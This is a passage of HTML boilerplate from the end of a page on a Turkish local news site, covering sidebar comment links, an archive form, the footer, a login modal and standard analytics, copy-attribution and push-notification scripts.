mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/samet-keven-70-yasinda-h65332.html#comment_285413" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/bekleme-alanlarindaki-koltuklara-kesilerek-zarar-veriliyor-h65451.html#comment_285411" title="" >O kadar masraf yapıldı.Kamera sistemini...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/recep-yekta-h65454.html#comment_285410" title="" >RABBİM MEKANINI CENNET EYLESİN... GERİDE...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h65455.html#comment_285407" title="" >Ali Ekber abinin mekanı cennet olsun. Işıklar...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/eslem-sare-koker-5-yasinda-h65433.html#comment_285406" title="" >Allah rahmetiyle muamele eylesin mekanı...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" selected>22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" selected>Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Tavana astığı iple yaşamına son verdi" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Ftavana-astigi-iple-yasamina-son-verdi-h65457.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('65457', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 